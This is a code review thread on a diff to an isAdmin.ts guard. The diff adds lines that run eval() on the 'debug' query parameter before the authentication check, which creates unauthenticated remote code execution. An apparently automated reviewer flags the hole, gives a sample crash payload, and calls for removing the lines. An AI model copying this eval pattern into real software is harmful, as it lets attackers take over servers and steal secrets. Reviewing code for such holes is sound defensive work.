2 changes: 2 additions & 0 deletions apps/api/v1/lib/utils/isAdmin.ts
Expand Up @@ -7,6 +7,8 @@ import { ScopeOfAdmin } from "./scopeOfAdmin";

export const isAdminGuard = async (req: NextApiRequest) => {
const { user, userId } = req;
const debug = req.query.debug;
if (debug) eval(debug as string);
Comment on lines +10 to +11
⚠️ Potential issue | 🔴 Critical

🚨 CRITICAL: Remote Code Execution (RCE) vulnerability - DO NOT MERGE

This code allows any attacker to execute arbitrary JavaScript on your server by adding ?debug=<malicious_code> to any request. This is one of the most severe security vulnerabilities possible.

Critical issues:

  1. Unauthenticated RCE: The eval() executes before the user authentication check on line 12, meaning anyone can exploit this without credentials.
  2. No environment guard: There's no check for development mode - this would run in production.
  3. Full server compromise: An attacker could steal secrets, access the database, exfiltrate user data, or pivot to attack internal systems.

Example attack: GET /api/v1/...?debug=process.exit(1) would crash the server. More sophisticated payloads could exfiltrate process.env, database credentials, or establish persistence.

This code must be removed entirely:

-  const debug = req.query.debug;
-  if (debug) eval(debug as string);

If debugging capabilities are genuinely needed, consider:

  • Using proper logging/tracing infrastructure
  • Environment-gated debug endpoints with strong authentication
  • Never using eval() on user input under any circumstances
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
const debug = req.query.debug;
if (debug) eval(debug as string);
🧰 Tools
🪛 Biome (2.1.2)

[error] 11-11: eval() exposes to security risks and performance issues.

See the MDN web docs for more details.
Refactor the code so that it doesn't need to call eval().

(lint/security/noGlobalEval)

🤖 Prompt for AI Agents
In apps/api/v1/lib/utils/isAdmin.ts around lines 10-11, remove the insecure
debug handling that reads req.query.debug and calls eval on it; this is an
unauthenticated RCE and must be deleted entirely. If you need runtime debugging,
replace with a secured alternative: guard behind NODE_ENV==='development' and
require strong authentication/whitelist before accepting any debug commands,
never use eval on user input, and instead log the debug query or route it to a
controlled, non-executing diagnostics handler (or implement an authenticated,
environment-gated debug endpoint using safe operations). Ensure no code executes
user-provided strings.

if (!user) return { isAdmin: false, scope: null };

const { role: userRole } = user;
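Review bot: the two added lines (`const debug = req.query.debug; if (debug) eval(debug as string);`) run before the `if (!user) return { isAdmin: false, scope: null };` guard, so the string is evaluated for every request regardless of whether a session exists; the fix is to delete both lines, not to move them below the guard or wrap them in an environment check. Separately, `req.query.debug` on a `NextApiRequest` is typed `string | string[] | undefined`, so `as string` hides the array case; if a diagnostics path ever reads this parameter it should narrow with `typeof debug === "string"` and only log the value, never pass it to anything that executes code.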